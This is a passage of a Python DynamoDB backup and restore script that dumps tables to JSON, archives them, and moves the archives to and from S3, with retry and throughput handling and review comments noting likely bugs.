        # Drop the trailing AZ letter ("us-east-1a" -> "us-east-1").
        aws_region = azone[:-1]

    if profile:
        return boto3.Session(profile_name=profile).client(service, region_name=aws_region)
    return boto3.client(service, region_name=aws_region)
def get_table_name_by_tag(profile, region, tag):
    """
    Using provided connection to dynamodb and tag, get all tables that have provided tag

    Profile provided and, if needed, used to build connection to STS.

    ``tag`` is supplied as "KEY=VALUE" (see the --tag CLI help).  Returns the
    list of matching table names.
    """
    matching_tables = []
    all_tables = []
    sts = _get_aws_client(profile, region, "sts")
    dynamo = _get_aws_client(profile, region, "dynamodb")
    # Account number is needed to build each table's ARN for list_tags_of_resource.
    account_number = sts.get_caller_identity().get("Account")
    paginator = dynamo.get_paginator("list_tables")
    # Split on the first "=" only: the tag VALUE may itself contain "=".
    # (The previous bare split() produced a ValueError-free but wrong 2-way
    # unpack failure for values such as "env=a=b".)
    tag_key, tag_value = tag.split("=", 1)

    get_all_tables = paginator.paginate()
    for page in get_all_tables:
        for table in page["TableNames"]:
            all_tables.append(table)
            logging.debug("Found table " + table)

    for table in all_tables:
        table_arn = "arn:aws:dynamodb:{}:{}:table/{}".format(region, account_number, table)
        table_tags = dynamo.list_tags_of_resource(
            ResourceArn=table_arn
        )
        for found_tag in table_tags["Tags"]:
            if found_tag["Key"] == tag_key:
                logging.debug("Checking table " + table + " tag " + found_tag["Key"])
                if found_tag["Value"] == tag_value:
                    matching_tables.append(table)
                    logging.info("Matched table " + table)

    return matching_tables
def do_put_bucket_object(profile, region, bucket, bucket_object):
    """
    Put object into bucket. Only called if we've also created an archive file with do_archive()

    Bucket must exist prior to running this function.
    profile could be None.
    bucket_object is file to be uploaded
    """
    client = _get_aws_client(profile, region, "s3")
    logging.info("Uploading backup to S3 bucket " + bucket)
    try:
        # Server-side encrypt every uploaded backup.
        client.upload_file(
            bucket_object, bucket, bucket_object,
            ExtraArgs={"ServerSideEncryption": "AES256"},
        )
    except botocore.exceptions.ClientError as e:
        logging.exception("Failed to put file to S3 bucket\n\n" + str(e))
        sys.exit(1)
def do_get_s3_archive(profile, region, bucket, table, archive):
    """
    Fetch latest file named filename from S3
    Bucket must exist prior to running this function.
    filename is args.dumpPath. File would be "args.dumpPath" with suffix .tar.bz2 or .zip

    Reads the module-global ``args`` (args.dumpPath) set in main().  The
    archive is downloaded to /tmp and extracted into the current directory.
    """
    s3 = _get_aws_client(profile, region, "s3")

    # Map the CLI archive flag ("tar"/"zip") to the suffix used at backup time.
    # NOTE(review): if ``archive`` is falsy, archive_type is never bound and the
    # key comparison below raises NameError -- confirm callers always pass it.
    if archive:
        if archive == "tar":
            archive_type = "tar.bz2"
        else:
            archive_type = "zip"

    # Make sure bucket exists before continuing
    try:
        s3.head_bucket(
            Bucket=bucket
        )
    except botocore.exceptions.ClientError as e:
        logging.exception("S3 bucket " + bucket + " does not exist. "
                          "Can't get backup file\n\n" + str(e))
        sys.exit(1)

    try:
        contents = s3.list_objects_v2(
            Bucket=bucket,
            Prefix=args.dumpPath
        )
    except botocore.exceptions.ClientError as e:
        logging.exception("Issue listing contents of bucket " + bucket + "\n\n" + str(e))
        sys.exit(1)

    # Script will always overwrite older backup. Bucket versioning stores multiple backups.
    # Therefore, just get item from bucket based on table name since that's what we name the files.
    # NOTE(review): list_objects_v2 omits "Contents" when nothing matches the
    # prefix, which would raise KeyError here -- verify against empty buckets.
    filename = None
    for d in contents["Contents"]:
        if d["Key"] == "{}/{}.{}".format(args.dumpPath, table, archive_type):
            filename = d["Key"]

    if not filename:
        logging.exception("Unable to find file to restore from. "
                          "Confirm the name of the table you're restoring.")
        sys.exit(1)

    output_file = "/tmp/" + os.path.basename(filename)
    logging.info("Downloading file " + filename + " to " + output_file)
    s3.download_file(bucket, filename, output_file)

    # Extract archive based on suffix
    if tarfile.is_tarfile(output_file):
        try:
            logging.info("Extracting tar file...")
            with tarfile.open(name=output_file, mode="r:bz2") as a:
                a.extractall(path=".")
        except tarfile.ReadError as e:
            logging.exception("Error reading downloaded archive\n\n" + str(e))
            sys.exit(1)
        except tarfile.ExtractError as e:
            # ExtractError is raised for non-fatal errors on extract method
            logging.error("Error during extraction: " + str(e))
    # Assuming zip file here since we're only supporting tar and zip at this time
    else:
        try:
            logging.info("Extracting zip file...")
            with zipfile.ZipFile(output_file, "r") as z:
                z.extractall(path=".")
        except zipfile.BadZipFile as e:
            logging.exception("Problem extracting zip file\n\n" + str(e))
            sys.exit(1)
def do_archive(archive_type, dump_path):
    """
    Create compressed archive of dump_path.
    Accepts archive_type of zip or tar and requires dump_path, directory added to archive

    Returns a tuple ``(did_archive, archive_path)``; ``(False, None)`` when
    the archive type is unsupported.  Fatal archive errors exit the process.
    """
    archive_base = dump_path

    if archive_type.lower() == "tar":
        archive = archive_base + ".tar.bz2"
        try:
            logging.info("Creating tar file " + archive + "...")
            with tarfile.open(name=archive, mode="w:bz2") as a:
                # Walk the dump directory and add every file (paths stored as-is).
                for root, dirs, files in os.walk(archive_base):
                    for file in files:
                        a.add(os.path.join(root, file))
            return True, archive
        except tarfile.CompressionError as e:
            logging.exception("compression method is not supported or the data cannot be"
                              " decoded properly.\n\n" + str(e))
            sys.exit(1)
        except tarfile.TarError as e:
            logging.exception("Error creating tarfile archive.\n\n" + str(e))
            sys.exit(1)
    elif archive_type.lower() == "zip":
        try:
            logging.info("Creating zip file...")
            archive = archive_base + ".zip"
            with zipfile.ZipFile(archive, "w") as z:
                for root, dirs, files in os.walk(archive_base):
                    for file in files:
                        z.write(os.path.join(root, file))
            return True, archive
        except zipfile.BadZipFile as e:
            logging.exception("Problem creating zip file\n\n" + str(e))
            sys.exit(1)
        except zipfile.LargeZipFile:
            logging.exception("Zip file would be too large. Update code to use Zip64 to continue.")
            sys.exit(1)
    else:
        logging.error("Unsupported archive format received. Probably shouldn't have "
                      "made it to this code path. Skipping attempt at creating archive file")
        return False, None
def get_table_name_matches(conn, table_name_wildcard, separator):
    """
    Find tables to backup

    Pages through list_tables on the given connection and returns every
    table name that matches ``table_name_wildcard`` (fnmatch semantics).
    """
    all_tables = []
    last_evaluated_table_name = None

    # Drain the paginated listing; "LastEvaluatedTableName" is absent on the
    # final page.
    while True:
        table_list = conn.list_tables(exclusive_start_table_name=last_evaluated_table_name)
        all_tables.extend(table_list["TableNames"])
        if "LastEvaluatedTableName" not in table_list:
            break
        last_evaluated_table_name = table_list["LastEvaluatedTableName"]

    matching_tables = []
    for candidate in all_tables:
        if fnmatch.fnmatch(candidate, table_name_wildcard):
            logging.info("Adding %s", candidate)
            matching_tables.append(candidate)

    return matching_tables
def get_restore_table_matches(table_name_wildcard, separator):
    """
    Find tables to restore

    Lists the dump directory (args.dumpPath, falling back to the current
    working directory) and returns subdirectory names matching the wildcard.
    Reads the module-global ``args`` set in main().
    """
    matching_tables = []
    try:
        dir_list = os.listdir("./" + args.dumpPath)
    except OSError:
        logging.info("Cannot find \"./%s\", Now trying current working directory.."
                     % args.dumpPath)
        dump_data_path = CURRENT_WORKING_DIR
        try:
            dir_list = os.listdir(dump_data_path)
        except OSError:
            logging.info("Cannot find \"%s\" directory containing dump files!"
                         % dump_data_path)
            sys.exit(1)

    for dir_name in dir_list:
        if table_name_wildcard == "*":
            # Bare "*" matches every dumped table.
            matching_tables.append(dir_name)
        elif separator == "":
            # Empty separator means CamelCase names: take the first
            # capitalised word of the wildcard as the prefix.
            if dir_name.startswith(re.sub(r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0])
                                   .split()[0]):
                matching_tables.append(dir_name)
        elif dir_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
            # Separator mode: compare the text before the first separator.
            matching_tables.append(dir_name)

    return matching_tables
def change_prefix(source_table_name, source_wildcard, destination_wildcard, separator):
    """
    Update prefix used for searching tables

    Rewrites ``source_table_name`` so that the prefix taken from
    ``source_wildcard`` (text before "*") is replaced by the prefix from
    ``destination_wildcard``.  Returns None when the name does not carry
    the source prefix.
    """
    src_prefix = source_wildcard.split("*", 1)[0]
    dst_prefix = destination_wildcard.split("*", 1)[0]

    if separator == "":
        # CamelCase mode: insert spaces before capitals to find word
        # boundaries; the first word is the prefix.
        spaced = re.sub(r"([A-Z])", r" \1", source_table_name)
        if spaced.split()[0] == src_prefix:
            remainder = spaced.split(" ", 1)[1].replace(" ", "")
            return dst_prefix + remainder

    if source_table_name.split(separator, 1)[0] == src_prefix:
        remainder = source_table_name.split(separator, 1)[1]
        return dst_prefix + separator + remainder
def delete_table(conn, sleep_interval, table_name):
    """
    Delete table table_name

    Retries on limit/throttling/in-use responses, then polls describe_table
    until DynamoDB reports the table gone.  No-op when --dataOnly was given
    (reads the module-global ``args`` set in main()).
    """
    if not args.dataOnly:
        while True:
            # delete table if exists
            table_exist = True
            try:
                conn.delete_table(table_name)
            except boto.exception.JSONResponseError as e:
                if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceNotFoundException":
                    # Table is gone (either it never existed or a prior
                    # iteration's delete completed) -- we are done.
                    table_exist = False
                    logging.info(table_name + " table deleted!")
                    break
                elif e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
                    logging.info("Limit exceeded, retrying deletion of " + table_name + "..")
                    time.sleep(sleep_interval)
                elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
                    logging.info("Control plane limit exceeded, retrying deletion of " +
                                 table_name + "..")
                    time.sleep(sleep_interval)
                elif e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceInUseException":
                    logging.info(table_name + " table is being deleted..")
                    time.sleep(sleep_interval)
                else:
                    logging.exception(e)
                    sys.exit(1)

            # if table exists, wait till deleted
            if table_exist:
                try:
                    # Poll until describe_table raises ResourceNotFound.
                    while True:
                        logging.info("Waiting for " + table_name + " table to be deleted.. [" +
                                     conn.describe_table(table_name)["Table"]["TableStatus"] + "]")
                        time.sleep(sleep_interval)
                except boto.exception.JSONResponseError as e:
                    if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceNotFoundException":
                        # Outer loop re-issues delete_table, which then hits
                        # ResourceNotFound and breaks out above.
                        logging.info(table_name + " table deleted.")
                        pass
                    else:
                        logging.exception(e)
                        sys.exit(1)
def mkdir_p(path):
    """
    Create directory to hold dump

    Behaves like ``mkdir -p``: creates intermediate directories and is a
    no-op when the directory already exists.
    """
    try:
        os.makedirs(path)
    except OSError as exc:
        # Only swallow "already exists as a directory"; re-raise anything else.
        if exc.errno != errno.EEXIST or not os.path.isdir(path):
            raise
def batch_write(conn, sleep_interval, table_name, put_requests):
    """
    Write data to table_name

    Issues batch_write_item and keeps retrying any UnprocessedItems with a
    linearly growing backoff, up to MAX_RETRY attempts, after which the
    remainder is logged and dropped.
    """
    request_items = {table_name: put_requests}
    attempt = 1
    backoff = sleep_interval
    while True:
        response = conn.batch_write_item(request_items)
        unprocessed_items = response["UnprocessedItems"]
        if not unprocessed_items:
            break
        if attempt > MAX_RETRY:
            # Give up on this batch rather than looping forever.
            logging.info("Max retries reached, failed to processed batch write: " +
                         json.dumps(unprocessed_items, indent=JSON_INDENT))
            logging.info("Ignoring and continuing..")
            break
        logging.debug(str(len(unprocessed_items)) +
                      " unprocessed items, retrying after %s seconds.. [%s/%s]"
                      % (str(backoff), str(attempt), str(MAX_RETRY)))
        request_items = unprocessed_items
        time.sleep(backoff)
        backoff += sleep_interval
        attempt += 1
def wait_for_active_table(conn, table_name, verb):
    """
    Wait for table to be in the desired (ACTIVE) state.

    ``verb`` is used only in log messages (e.g. "created", "updated").
    NOTE(review): relies on the module-global ``sleep_interval`` set in
    main(); it is not a parameter of this function.
    """
    while True:
        if conn.describe_table(table_name)["Table"]["TableStatus"] != "ACTIVE":
            logging.info("Waiting for " + table_name + " table to be " + verb + ".. [" +
                         conn.describe_table(table_name)["Table"]["TableStatus"] + "]")
            time.sleep(sleep_interval)
        else:
            logging.info(table_name + " " + verb + ".")
            break
def update_provisioned_throughput(conn, table_name, read_capacity, write_capacity, wait=True):
    """
    Update provisioned throughput on the table to provided values

    Retries on limit/throttling responses (sleeping the module-global
    ``sleep_interval`` between attempts) and optionally waits for the table
    to return to ACTIVE afterwards.
    """
    logging.info("Updating " + table_name + " table read capacity to: " +
                 str(read_capacity) + ", write capacity to: " + str(write_capacity))
    while True:
        try:
            conn.update_table(table_name,
                              {"ReadCapacityUnits": int(read_capacity),
                               "WriteCapacityUnits": int(write_capacity)})
            break
        except boto.exception.JSONResponseError as e:
            if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
                logging.info("Limit exceeded, retrying updating throughput of " + table_name + "..")
                time.sleep(sleep_interval)
            elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
                logging.info("Control plane limit exceeded, retrying updating throughput"
                             "of " + table_name + "..")
                time.sleep(sleep_interval)
            else:
                # Fail fast on unexpected error types (consistent with
                # delete_table/do_empty/do_restore).  Previously this loop
                # retried such errors immediately without sleeping, spinning
                # forever on a non-retryable failure.
                logging.exception(e)
                sys.exit(1)

    # wait for provisioned throughput update completion
    if wait:
        wait_for_active_table(conn, table_name, "updated")
def do_empty(dynamo, table_name):
    """
    Empty table named table_name

    Implemented as delete + recreate using the table's current schema,
    indexes and provisioned throughput.  Relies on the module-globals
    ``sleep_interval`` and ``start_time`` set in main().
    """
    logging.info("Starting Empty for " + table_name + "..")

    # get table schema
    logging.info("Fetching table schema for " + table_name)
    table_data = dynamo.describe_table(table_name)
    table_desc = table_data["Table"]
    table_attribute_definitions = table_desc["AttributeDefinitions"]
    table_key_schema = table_desc["KeySchema"]
    original_read_capacity = table_desc["ProvisionedThroughput"]["ReadCapacityUnits"]
    original_write_capacity = table_desc["ProvisionedThroughput"]["WriteCapacityUnits"]
    table_local_secondary_indexes = table_desc.get("LocalSecondaryIndexes")
    table_global_secondary_indexes = table_desc.get("GlobalSecondaryIndexes")

    # Recreate with the same throughput the table currently has.
    table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
                                    "WriteCapacityUnits": int(original_write_capacity)}

    logging.info("Deleting Table " + table_name)
    delete_table(dynamo, sleep_interval, table_name)

    logging.info("Creating Table " + table_name)

    while True:
        try:
            dynamo.create_table(table_attribute_definitions, table_name, table_key_schema,
                                table_provisioned_throughput, table_local_secondary_indexes,
                                table_global_secondary_indexes)
            break
        except boto.exception.JSONResponseError as e:
            if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
                logging.info("Limit exceeded, retrying creation of " + table_name + "..")
                time.sleep(sleep_interval)
            elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
                logging.info("Control plane limit exceeded, retrying creation of " +
                             table_name + "..")
                time.sleep(sleep_interval)
            else:
                logging.exception(e)
                sys.exit(1)

    # wait for table creation completion
    wait_for_active_table(dynamo, table_name, "created")

    logging.info("Recreation of " + table_name + " completed. Time taken: " + str(
        datetime.datetime.now().replace(microsecond=0) - start_time))
def do_backup(dynamo, read_capacity, tableQueue=None, srcTable=None):
    """
    Connect to DynamoDB and perform the backup for srcTable or each table in tableQueue

    Dumps each table's schema (schema.json) and its scanned items (data/NNNN.json)
    under args.dumpPath.  Reads the module-globals ``args`` and ``start_time``
    set in main().

    NOTE(review): the entire backup body sits inside the ``if tableQueue``
    loop, so a call with only ``srcTable`` set (tableQueue=None) performs no
    work -- confirm against the call sites in main().
    """
    scanFilter=None
    # Build an optional BETWEEN scan filter from the --dateFilter* options.
    if args.dateFilterField and args.dateFilterSince:
        since = datetime.datetime.strptime(args.dateFilterSince, '%Y-%m-%d').strftime('%FT%TZ')
        until = datetime.datetime.now().strftime('%FT%TZ')
        if args.dateFilterUntil:
            until = datetime.datetime.strptime(args.dateFilterUntil, '%Y-%m-%d').strftime('%FT%TZ')
        scanFilter = {
            args.dateFilterField: {
                "ComparisonOperator": "BETWEEN",
                "AttributeValueList": [
                    {"S": since},
                    {"S": until}
                ]
            }
        }
    if srcTable:
        table_name = srcTable
    if tableQueue:
        # Worker loop: pull table names until the None sentinel arrives.
        while True:
            table_name = tableQueue.get()
            if table_name is None:
                break
            logging.info("Starting backup for " + table_name + "..")

            # trash data, re-create subdir
            if os.path.exists(args.dumpPath + os.sep + table_name):
                shutil.rmtree(args.dumpPath + os.sep + table_name)
            mkdir_p(args.dumpPath + os.sep + table_name)

            # get table schema
            logging.info("Dumping table schema for " + table_name)
            f = open(args.dumpPath + os.sep + table_name + os.sep + SCHEMA_FILE, "w+")
            table_desc = dynamo.describe_table(table_name)
            f.write(json.dumps(table_desc, indent=JSON_INDENT))
            f.close()

            if not args.schemaOnly:
                original_read_capacity = \
                    table_desc["Table"]["ProvisionedThroughput"]["ReadCapacityUnits"]
                original_write_capacity = \
                    table_desc["Table"]["ProvisionedThroughput"]["WriteCapacityUnits"]

                # override table read capacity if specified
                if read_capacity is not None and read_capacity != original_read_capacity:
                    update_provisioned_throughput(dynamo, table_name,
                                                  read_capacity, original_write_capacity)

                # get table data
                logging.info("Dumping table items for " + table_name)
                mkdir_p(args.dumpPath + os.sep + table_name + os.sep + DATA_DIR)

                i = 1
                last_evaluated_key = None

                while True:
                    try:
                        scanned_table = dynamo.scan(table_name,
                                                    scan_filter=scanFilter,
                                                    exclusive_start_key=last_evaluated_key)
                    except ProvisionedThroughputExceededException:
                        # NOTE(review): execution falls through after this
                        # handler, so ``scanned_table`` may be unbound below
                        # (NameError) and task_done() will be called a second
                        # time at the end of the loop body -- looks like this
                        # should break out instead; confirm intent.
                        logging.error("EXCEEDED THROUGHPUT ON TABLE " +
                                      table_name + ". BACKUP FOR IT IS USELESS.")
                        tableQueue.task_done()

                    f = open(
                        args.dumpPath + os.sep + table_name + os.sep + DATA_DIR + os.sep +
                        str(i).zfill(4) + ".json", "w+"
                    )
                    f.write(json.dumps(scanned_table, indent=JSON_INDENT))
                    f.close()

                    i += 1
                    # Keep paging until the scan response has no LastEvaluatedKey.
                    try:
                        last_evaluated_key = scanned_table["LastEvaluatedKey"]
                    except KeyError:
                        break

                # revert back to original table read capacity if specified
                if read_capacity is not None and read_capacity != original_read_capacity:
                    update_provisioned_throughput(dynamo,
                                                  table_name,
                                                  original_read_capacity,
                                                  original_write_capacity,
                                                  False)

            logging.info("Backup for " + table_name + " table completed. Time taken: " + str(
                datetime.datetime.now().replace(microsecond=0) - start_time))

            tableQueue.task_done()
def do_restore(dynamo, sleep_interval, source_table, destination_table, write_capacity):
    """
    Restore table

    Recreates ``destination_table`` from the dump of ``source_table``
    (schema.json + data/*.json) found under args.dumpPath or the current
    working directory, temporarily raising write capacity (table and GSIs)
    for the bulk load and reverting afterwards.  Honors the --dataOnly,
    --schemaOnly and --skipThroughputUpdate flags via the module-global
    ``args``; also reads the module-global ``start_time``.
    """
    logging.info("Starting restore for " + source_table + " to " + destination_table + "..")

    # create table using schema
    # restore source_table from dump directory if it exists else try current working directory
    if os.path.exists("%s/%s" % (args.dumpPath, source_table)):
        dump_data_path = args.dumpPath
    else:
        logging.info("Cannot find \"./%s/%s\", Now trying current working directory.."
                     % (args.dumpPath, source_table))
        if os.path.exists("%s/%s" % (CURRENT_WORKING_DIR, source_table)):
            dump_data_path = CURRENT_WORKING_DIR
        else:
            logging.info("Cannot find \"%s/%s\" directory containing dump files!"
                         % (CURRENT_WORKING_DIR, source_table))
            sys.exit(1)
    table_data = json.load(open(dump_data_path + os.sep + source_table + os.sep + SCHEMA_FILE))
    table = table_data["Table"]
    table_attribute_definitions = table["AttributeDefinitions"]
    table_table_name = destination_table
    table_key_schema = table["KeySchema"]
    original_read_capacity = table["ProvisionedThroughput"]["ReadCapacityUnits"]
    original_write_capacity = table["ProvisionedThroughput"]["WriteCapacityUnits"]
    table_local_secondary_indexes = table.get("LocalSecondaryIndexes")
    table_global_secondary_indexes = table.get("GlobalSecondaryIndexes")

    # override table write capacity if specified, else use RESTORE_WRITE_CAPACITY if original
    # write capacity is lower
    if write_capacity is None:
        if original_write_capacity < RESTORE_WRITE_CAPACITY:
            write_capacity = RESTORE_WRITE_CAPACITY
        else:
            write_capacity = original_write_capacity

    # override GSI write capacities if specified, else use RESTORE_WRITE_CAPACITY if original
    # write capacity is lower
    original_gsi_write_capacities = []
    if table_global_secondary_indexes is not None:
        for gsi in table_global_secondary_indexes:
            # Remember each GSI's original capacity so it can be reverted later.
            original_gsi_write_capacities.append(gsi["ProvisionedThroughput"]["WriteCapacityUnits"])

            if gsi["ProvisionedThroughput"]["WriteCapacityUnits"] < int(write_capacity):
                gsi["ProvisionedThroughput"]["WriteCapacityUnits"] = int(write_capacity)

    # temp provisioned throughput for restore
    table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
                                    "WriteCapacityUnits": int(write_capacity)}

    if not args.dataOnly:
        logging.info("Creating " + destination_table + " table with temp write capacity of " +
                     str(write_capacity))

        while True:
            try:
                dynamo.create_table(table_attribute_definitions, table_table_name, table_key_schema,
                                    table_provisioned_throughput, table_local_secondary_indexes,
                                    table_global_secondary_indexes)
                break
            except boto.exception.JSONResponseError as e:
                if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
                    logging.info("Limit exceeded, retrying creation of " + destination_table + "..")
                    time.sleep(sleep_interval)
                elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
                    logging.info("Control plane limit exceeded, "
                                 "retrying creation of " + destination_table + "..")
                    time.sleep(sleep_interval)
                else:
                    logging.exception(e)
                    sys.exit(1)

        # wait for table creation completion
        wait_for_active_table(dynamo, destination_table, "created")
    else:
        # update provisioned capacity
        if not args.skipThroughputUpdate and int(write_capacity) > original_write_capacity:
            update_provisioned_throughput(dynamo,
                                          destination_table,
                                          original_read_capacity,
                                          write_capacity,
                                          False)

    if not args.schemaOnly:
        # read data files
        logging.info("Restoring data for " + destination_table + " table..")
        data_file_list = os.listdir(dump_data_path + os.sep + source_table +
                                    os.sep + DATA_DIR + os.sep)
        data_file_list.sort()

        for data_file in data_file_list:
            logging.info("Processing " + data_file + " of " + destination_table)
            items = []
            item_data = json.load(
                open(
                    dump_data_path + os.sep + source_table + os.sep + DATA_DIR + os.sep + data_file
                )
            )
            items.extend(item_data["Items"])

            # batch write data
            put_requests = []
            while len(items) > 0:
                put_requests.append({"PutRequest": {"Item": items.pop(0)}})

                # flush every MAX_BATCH_WRITE
                if len(put_requests) == MAX_BATCH_WRITE:
                    logging.debug("Writing next " + str(MAX_BATCH_WRITE) +
                                  " items to " + destination_table + "..")
                    batch_write(dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
                    del put_requests[:]

            # flush remainder
            if len(put_requests) > 0:
                batch_write(dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)

        if not args.skipThroughputUpdate:
            # revert to original table write capacity if it has been modified
            if int(write_capacity) != original_write_capacity:
                update_provisioned_throughput(dynamo,
                                              destination_table,
                                              original_read_capacity,
                                              original_write_capacity,
                                              False)

            # loop through each GSI to check if it has changed and update if necessary
            if table_global_secondary_indexes is not None:
                gsi_data = []
                for gsi in table_global_secondary_indexes:
                    wcu = gsi["ProvisionedThroughput"]["WriteCapacityUnits"]
                    rcu = gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
                    original_gsi_write_capacity = original_gsi_write_capacities.pop(0)
                    if original_gsi_write_capacity != wcu:
                        gsi_data.append({
                            "Update": {
                                "IndexName": gsi["IndexName"],
                                "ProvisionedThroughput": {
                                    "ReadCapacityUnits":
                                        int(rcu),
                                    "WriteCapacityUnits": int(original_gsi_write_capacity)
                                }
                            }
                        })

                logging.info("Updating " + destination_table +
                             " global secondary indexes write capacities as necessary..")

                # NOTE(review): unlike the create_table loop above, this retry
                # loop has no else branch, so an unexpected error type retries
                # immediately without sleeping -- confirm intended.
                while True:
                    try:
                        dynamo.update_table(destination_table,
                                            global_secondary_index_updates=gsi_data)
                        break
                    except boto.exception.JSONResponseError as e:
                        if (e.body["__type"] ==
                                "com.amazonaws.dynamodb.v20120810#LimitExceededException"):
                            logging.info(
                                "Limit exceeded, retrying updating throughput of"
                                "GlobalSecondaryIndexes in " + destination_table + "..")
                            time.sleep(sleep_interval)
                        elif (e.body["__type"] ==
                                "com.amazon.coral.availability#ThrottlingException"):
                            logging.info(
                                "Control plane limit exceeded, retrying updating throughput of"
                                "GlobalSecondaryIndexes in " + destination_table + "..")
                            time.sleep(sleep_interval)

        # wait for table to become active
        wait_for_active_table(dynamo, destination_table, "active")

        logging.info("Restore for " + source_table + " to " + destination_table +
                     " table completed. Time taken: " + str(
                         datetime.datetime.now().replace(microsecond=0) - start_time))
    else:
        logging.info("Empty schema of " + source_table + " table created. Time taken: " +
                     str(datetime.datetime.now().replace(microsecond=0) - start_time))
def main():
    """
    Entrypoint to the script

    Parses CLI options, builds the DynamoDB connection (boto for data-plane
    work, boto3 for tag lookup/S3), then dispatches to the backup, restore
    or empty flow.  Publishes ``args``, ``sleep_interval`` and
    ``start_time`` as module globals consumed by the worker functions.
    """
    global args, sleep_interval, start_time

    # parse args
    parser = argparse.ArgumentParser(description="Simple DynamoDB backup/restore/empty.")
    parser.add_argument("-a", "--archive", help="Type of compressed archive to create."
                        "If unset, don't create archive", choices=["zip", "tar"])
    parser.add_argument("-b", "--bucket", help="S3 bucket in which to store or retrieve backups."
                        "[must already exist]")
    parser.add_argument("-m", "--mode", help="Operation to perform",
                        choices=["backup", "restore", "empty"])
    parser.add_argument("-r", "--region", help="AWS region to use, e.g. 'us-west-1'. "
                        "Can use AWS_DEFAULT_REGION for local testing. Use '" +
                        LOCAL_REGION + "' for local DynamoDB testing")
    parser.add_argument("--host", help="Host of local DynamoDB [required only for local]")
    parser.add_argument("--port", help="Port of local DynamoDB [required only for local]")
    parser.add_argument("--accessKey", help="Access key of local DynamoDB "
                        "[required only for local]")
    parser.add_argument("--secretKey", help="Secret key of local DynamoDB "
                        "[required only for local]")
    parser.add_argument("-p", "--profile",
                        help="AWS credentials file profile to use. Allows you to use a "
                        "profile instead accessKey, secretKey authentication")
    parser.add_argument("-s", "--srcTable",
                        help="Source DynamoDB table name to backup or restore from, "
                        "use 'tablename*' for wildcard prefix selection or '*' for "
                        "all tables. Mutually exclusive with --tag")
    parser.add_argument("-d", "--destTable",
                        help="Destination DynamoDB table name to backup or restore to, "
                        "use 'tablename*' for wildcard prefix selection "
                        "(defaults to use '-' separator) [optional, defaults to source]")
    parser.add_argument("--dateFilterField", help="Specify a date filter field on table backup "
                        "e.g. 'updateAt' [optional]")
    parser.add_argument("--dateFilterSince", help="Specify a since date filter on table backup"
                        "e.g. '1980-07-27' [optional]")
    parser.add_argument("--dateFilterUntil", help="Specify a until date filter on table backup "
                        "e.g. '1980-08-27' [optional]")
    parser.add_argument("--prefixSeparator", help="Specify a different prefix separator, "
                        "e.g. '.' [optional]")
    parser.add_argument("--noSeparator", action='store_true',
                        help="Overrides the use of a prefix separator for backup wildcard "
                        "searches [optional]")
    parser.add_argument("--readCapacity",
                        help="Change the temp read capacity of the DynamoDB table to backup "
                        "from [optional]")
    parser.add_argument("-t", "--tag", help="Tag to use for identifying tables to back up. "
                        "Mutually exclusive with srcTable. Provided as KEY=VALUE")
    parser.add_argument("--writeCapacity",
                        help="Change the temp write capacity of the DynamoDB table to restore "
                        "to [defaults to " + str(RESTORE_WRITE_CAPACITY) + ", optional]")
    parser.add_argument("--schemaOnly", action="store_true", default=False,
                        help="Backup or restore the schema only. Do not backup/restore data. "
                        "Can be used with both backup and restore modes. Cannot be used with "
                        "the --dataOnly [optional]")
    parser.add_argument("--dataOnly", action="store_true", default=False,
                        help="Restore data only. Do not delete/recreate schema [optional for "
                        "restore]")
    parser.add_argument("--skipThroughputUpdate", action="store_true", default=False,
                        help="Skip updating throughput values across tables [optional]")
    parser.add_argument("--dumpPath", help="Directory to place and search for DynamoDB table "
                        "backups (defaults to use '" + str(DATA_DUMP) + "') [optional]",
                        default=str(DATA_DUMP))
    parser.add_argument("--log", help="Logging level - DEBUG|INFO|WARNING|ERROR|CRITICAL "
                        "[optional]")
    args = parser.parse_args()

    # set log level
    log_level = LOG_LEVEL
    if args.log is not None:
        log_level = args.log.upper()
    logging.basicConfig(level=getattr(logging, log_level))

    # Check to make sure that --dataOnly and --schemaOnly weren't simultaneously specified
    if args.schemaOnly and args.dataOnly:
        logging.info("Options --schemaOnly and --dataOnly are mutually exclusive.")
        sys.exit(1)

    # instantiate connection
    if args.region == LOCAL_REGION:
        # Local DynamoDB (e.g. dynalite / DynamoDB Local) over plain HTTP.
        conn = boto.dynamodb2.layer1.DynamoDBConnection(aws_access_key_id=args.accessKey,
                                                        aws_secret_access_key=args.secretKey,
                                                        host=args.host,
                                                        port=int(args.port),
                                                        is_secure=False)
        sleep_interval = LOCAL_SLEEP_INTERVAL
    else:
        if not args.profile:
            conn = boto.dynamodb2.connect_to_region(args.region, aws_access_key_id=args.accessKey,
                                                    aws_secret_access_key=args.secretKey)
            sleep_interval = AWS_SLEEP_INTERVAL
        else:
            conn = boto.dynamodb2.connect_to_region(args.region, profile_name=args.profile)
            sleep_interval = AWS_SLEEP_INTERVAL

    # don't proceed if connection is not established
    if not conn:
        logging.info("Unable to establish connection with dynamodb")
        sys.exit(1)

    # set prefix separator
    prefix_separator = DEFAULT_PREFIX_SEPARATOR
    if args.prefixSeparator is not None:
        prefix_separator = args.prefixSeparator
    if args.noSeparator is True:
        prefix_separator = None

    # do backup/restore
    start_time = datetime.datetime.now().replace(microsecond=0)
    if args.mode == "backup":
        matching_backup_tables = []
        if args.tag:
            # Use Boto3 to find tags. Boto3 provides a paginator that makes searching ta
            matching_backup_tables = get_table_name_by_tag(args.profile, args.region, args.tag)
        elif args.srcTable.find("*") != -1:
            matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
        elif args.srcTable:
